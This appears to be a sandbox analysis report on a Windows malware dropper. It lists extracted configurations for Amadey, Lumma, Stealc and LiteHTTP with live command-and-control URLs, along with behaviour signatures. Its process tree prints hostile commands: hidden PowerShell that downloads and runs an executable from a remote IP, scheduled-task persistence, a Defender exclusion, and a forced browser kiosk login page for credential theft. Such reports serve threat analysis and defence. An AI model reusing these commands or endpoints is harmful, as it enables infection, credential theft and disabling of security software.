Analysis

  • max time kernel
    118s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/03/2025, 15:02

General

  • Target

    df29acfa6f9a86d25389ad33acc42cd89a99673c8fa575e98eb84edba2b67483.exe

  • Size

    5.4MB

  • MD5

    663c2512c27d6e3611342c85bca92ac7

  • SHA1

    227b9ee52b86dbeae1ea7c183887f7cf2d9795bc

  • SHA256

    df29acfa6f9a86d25389ad33acc42cd89a99673c8fa575e98eb84edba2b67483

  • SHA512

    81e4decf6e2a5a6733fdcb0e353ca2e14f2c51aeb078fc92ab59628eff3d6f69b075cebc3e76eac64b7e2b1337b48492ecafef2ce5e0af2f6166c2fd465773da

  • SSDEEP

    98304:CDL8DxZvwqCTgIrrkfKkLBp+F9J7hGEr6+dklKvXjPgVejlqpJAgbXgtPh3ctX1H:CDmv0rrKBAF9CEW+WCX+kqsCQRh3ct

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://absoulpushx.life/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://defaulemot.run/api

https://narisechairedd.shop/api

https://2.sterpickced.digital/api

https://featureccus.shop/api

https://zmrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://latchclan.shop/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.10

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 23 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 36 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies registry class 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\df29acfa6f9a86d25389ad33acc42cd89a99673c8fa575e98eb84edba2b67483.exe
    "C:\Users\Admin\AppData\Local\Temp\df29acfa6f9a86d25389ad33acc42cd89a99673c8fa575e98eb84edba2b67483.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G3X13.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G3X13.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1t87p0.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1t87p0.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
            "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1604
            • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
              "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:428
          • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
            "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5100
            • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
              "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3972
          • C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe
            "C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2296
            • C:\Windows\System32\wscript.exe
              "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
              6⤵
              • Blocklisted process makes network request
              • Downloads MZ/PE file
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3076
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\C7447133B447E40831AC53FC89ACBA69\737BA62CB5FFD523BDAE62FA6517D812.vbe" /f /rl highest
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4216
              • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2348
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CD545D5748B334000:00000000000000000000000000000000000000000000001CD545D917DDC77FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2976
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\OpenCL.pif
                    OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CD545D5748B334000:00000000000000000000000000000000000000000000001CD545D917DDC77FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                    9⤵
                    • Executes dropped EXE
                    PID:4320
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5024
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CCF250A6C3DDCC000:00000000000000000000000000000000000000000000001CCF250E0F90701000 -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5008
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\OpenCL.pif
                    OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CCF250A6C3DDCC000:00000000000000000000000000000000000000000000001CCF250E0F90701000 -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                    9⤵
                    • Executes dropped EXE
                    PID:4316
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2908
          • C:\Users\Admin\AppData\Local\Temp\10167580101\OGVK2io.exe
            "C:\Users\Admin\AppData\Local\Temp\10167580101\OGVK2io.exe"
            5⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\S0gQ0bV3\$77Anubis.exe""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4852
          • C:\Users\Admin\AppData\Local\Temp\10167600101\3732c8e36f.exe
            "C:\Users\Admin\AppData\Local\Temp\10167600101\3732c8e36f.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2272
            • C:\Users\Admin\AppData\Local\Temp\E2A3361GKJULK7R29Q925.exe
              "C:\Users\Admin\AppData\Local\Temp\E2A3361GKJULK7R29Q925.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6008
          • C:\Users\Admin\AppData\Local\Temp\10167610101\f15854954c.exe
            "C:\Users\Admin\AppData\Local\Temp\10167610101\f15854954c.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1424
          • C:\Users\Admin\AppData\Local\Temp\10167620101\e7895bb844.exe
            "C:\Users\Admin\AppData\Local\Temp\10167620101\e7895bb844.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1188
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5008
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4816
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2588
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2484
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4288
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:2900
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:3972
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 27194 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd019c6d-d46b-4878-a0be-2b611f470dbf} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" gpu
                    8⤵
                      PID:2564
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 28114 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5788e12d-321d-4f24-b388-9307a732e1dd} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" socket
                      8⤵
                        PID:4452
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3244 -prefMapHandle 3232 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6770b9e-8672-40fe-9685-06b2707393c3} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
                        8⤵
                          PID:1980
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4036 -childID 2 -isForBrowser -prefsHandle 4028 -prefMapHandle 3340 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa7dd44-6735-408e-80b8-d6a152ca27b6} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
                          8⤵
                            PID:5224
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4864 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4784 -prefMapHandle 4844 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24244586-51f2-4465-8ba8-cc029e41f5a0} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" utility
                            8⤵
                            • Checks processor information in registry
                            PID:6832
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 3 -isForBrowser -prefsHandle 4024 -prefMapHandle 5508 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa71174a-3160-4a97-b372-3de7cf093d57} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
                            8⤵
                              PID:7292
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 4 -isForBrowser -prefsHandle 5532 -prefMapHandle 5632 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0706b615-eda8-4177-b332-9a368d8fbca8} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
                              8⤵
                                PID:5436
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5848 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5860 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6be0c513-39d8-4e50-ab9b-5dfcc09d92f9} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
                                8⤵
                                  PID:5448
                          • C:\Users\Admin\AppData\Local\Temp\10167630101\274d550942.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167630101\274d550942.exe"
                            5⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:7472
                          • C:\Users\Admin\AppData\Local\Temp\10167640101\431a6466f0.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167640101\431a6466f0.exe"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:6284
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c schtasks /create /tn namZfmaJXT0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XBbrseWtr.hta" /sc minute /mo 25 /ru "Admin" /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:6320
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /tn namZfmaJXT0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XBbrseWtr.hta" /sc minute /mo 25 /ru "Admin" /f
                                7⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:6432
                            • C:\Windows\SysWOW64\mshta.exe
                              mshta C:\Users\Admin\AppData\Local\Temp\XBbrseWtr.hta
                              6⤵
                              • Checks computer location settings
                              • System Location Discovery: System Language Discovery
                              PID:6336
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XPZ2LZYY2PI2JE50ZXDPAQVLCUUHYAZS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                7⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Downloads MZ/PE file
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6496
                                • C:\Users\Admin\AppData\Local\TempXPZ2LZYY2PI2JE50ZXDPAQVLCUUHYAZS.EXE
                                  "C:\Users\Admin\AppData\Local\TempXPZ2LZYY2PI2JE50ZXDPAQVLCUUHYAZS.EXE"
                                  8⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:6952
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd" "
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:6804
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 2
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:6864
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:7128
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7140
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:7316
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7272
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:7508
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7536
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn "SJgwcmaYhU9" /tr "mshta \"C:\Temp\rXqVUsijI.hta\"" /sc minute /mo 25 /ru "Admin" /f
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:7696
                            • C:\Windows\SysWOW64\mshta.exe
                              mshta "C:\Temp\rXqVUsijI.hta"
                              6⤵
                              • Checks computer location settings
                              • System Location Discovery: System Language Discovery
                              PID:7720
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                7⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Downloads MZ/PE file
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:7976
                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                  8⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:5712
                          • C:\Users\Admin\AppData\Local\Temp\10167660101\e9ff01b5c1.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167660101\e9ff01b5c1.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:6344
                          • C:\Users\Admin\AppData\Local\Temp\10167670101\071d97c0f0.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167670101\071d97c0f0.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:4196
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
